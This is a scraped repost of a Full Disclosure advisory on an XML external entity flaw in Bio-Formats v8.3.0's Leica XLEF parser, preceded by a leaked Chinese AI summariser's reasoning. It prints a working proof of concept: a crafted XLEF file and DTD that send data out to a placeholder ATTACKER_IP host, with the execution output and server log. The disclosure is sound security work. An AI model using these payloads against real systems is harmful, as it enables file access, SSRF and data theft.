Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。好的,我先看看这篇文章讲的是什么。 文章标题是“Full Disclosure”,看起来像是一个安全漏洞的披露。发件人是Ron E,日期是2025年12月29日。内容提到Bio-Formats软件中的一个XML外部实体(XXE)漏洞,特别是在处理Leica Microsystems的元数据组件时。 漏洞的原因是使用了配置不安全的DocumentBuilderFactory来处理Leica的XML元数据文件,比如XLEF文件。当攻击者提供一个恶意构造的XML文件时,解析器允许外部实体解析和外部DTD加载,导致攻击者可以触发任意的网络请求、访问本地资源或造成拒绝服务。 影响部分列出了攻击者可能执行的各种操作,包括XXE注入、SSRF、访问本地文件、DoS以及数据外泄。这些都通过XML解析触发,不需要认证。 然后有一个概念验证的例子,展示了如何构造恶意XLEF文件和外部DTD来触发漏洞。执行过程和输出结果也详细说明了攻击是如何进行的。 用户的需求是用中文总结这篇文章的内容,控制在100字以内。所以我要抓住关键点:Bio-Formats软件中的XXE漏洞,影响Leica XML元数据解析,可能导致网络请求、资源访问、DoS等风险。 现在我要把这些信息浓缩成一句话或几句话,确保不超过100字,并且直接描述内容,不需要开头语。 </think> Bio-Formats软件中存在一个XML外部实体(XXE)漏洞,在处理Leica Microsystems的元数据文件时未正确限制外部实体引用。攻击者可通过构造恶意XML文件触发任意网络请求、访问本地资源或导致服务中断。 2026-1-6 06:59:24 Author: seclists.org(查看原文) 阅读量:4 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Ron E <ronaldjedgerson () gmail com>
Date: Mon, 29 Dec 2025 22:56:29 -0500
Bio-Formats contains an XML External Entity (XXE) vulnerability in the
Leica Microsystems metadata parsing component. The vulnerability is caused
by the use of an insecurely configured DocumentBuilderFactory when
processing Leica XML-based metadata files (e.g., XLEF). When a crafted XML
file is supplied, the parser allows external entity resolution and external
DTD loading, enabling attackers to trigger arbitrary outbound network
requests, access local system resources, or cause a denial-of-service
condition during XML parsing.

*Impact:*
An attacker who can supply a crafted Leica XML metadata file may:
* Trigger XML External Entity (XXE) injection
* Perform server-side request forgery (SSRF) via outbound HTTP requests
* Access local files where XML-safe content exists
* Cause denial of service through entity expansion or parser instability
* Exfiltrate data through blind out-of-band channels
Exploitation occurs during XML parsing and does not require authentication.

*Proof of Concept:*
Malicious XLEF File
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
  <!ENTITY % ext SYSTEM "http://ATTACKER_IP:8000/evil.dtd";>
  %ext;
]>
<xlef>
  <Image>&exfil;</Image>
</xlef>
Attacker-Controlled External DTD (evil.dtd)
<!ENTITY exfil SYSTEM "http://ATTACKER_IP:8000/exfil?data=ubuntu";>

*Exploit Execution:*
java -cp bioformats_package.jar \
     loci.formats.tools.ImageInfo xxe_blind.xlef

*Observed Exploit Output:*
Victim Application Output
Initializing reader
XLEFReader initializing xxe_blind.xlef
http://ATTACKER_IP:8000/exfil?data=ubuntu
java.io.FileNotFoundException: http://ATTACKER_IP:8000/exfil?data=ubuntu
    at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity
    at org.apache.xerces.impl.XMLEntityManager.startEntity
    at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset
    at javax.xml.parsers.DocumentBuilder.parse
    at LMSXmlDocument.initFromFilepath(LMSXmlDocument.java:125)
Attacker HTTP Server Log
192.x.x.x - - [23/Dec/2025 23:28:19]
"GET /exfil?data=ubuntu HTTP/1.1" 404 -
The outbound HTTP request confirms that the XML parser resolved
attacker-controlled external entities during file parsing.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser Ron E (Jan 05)

文章来源: https://seclists.org/fulldisclosure/2026/Jan/6
如有侵权请联系:admin#unsafe.sh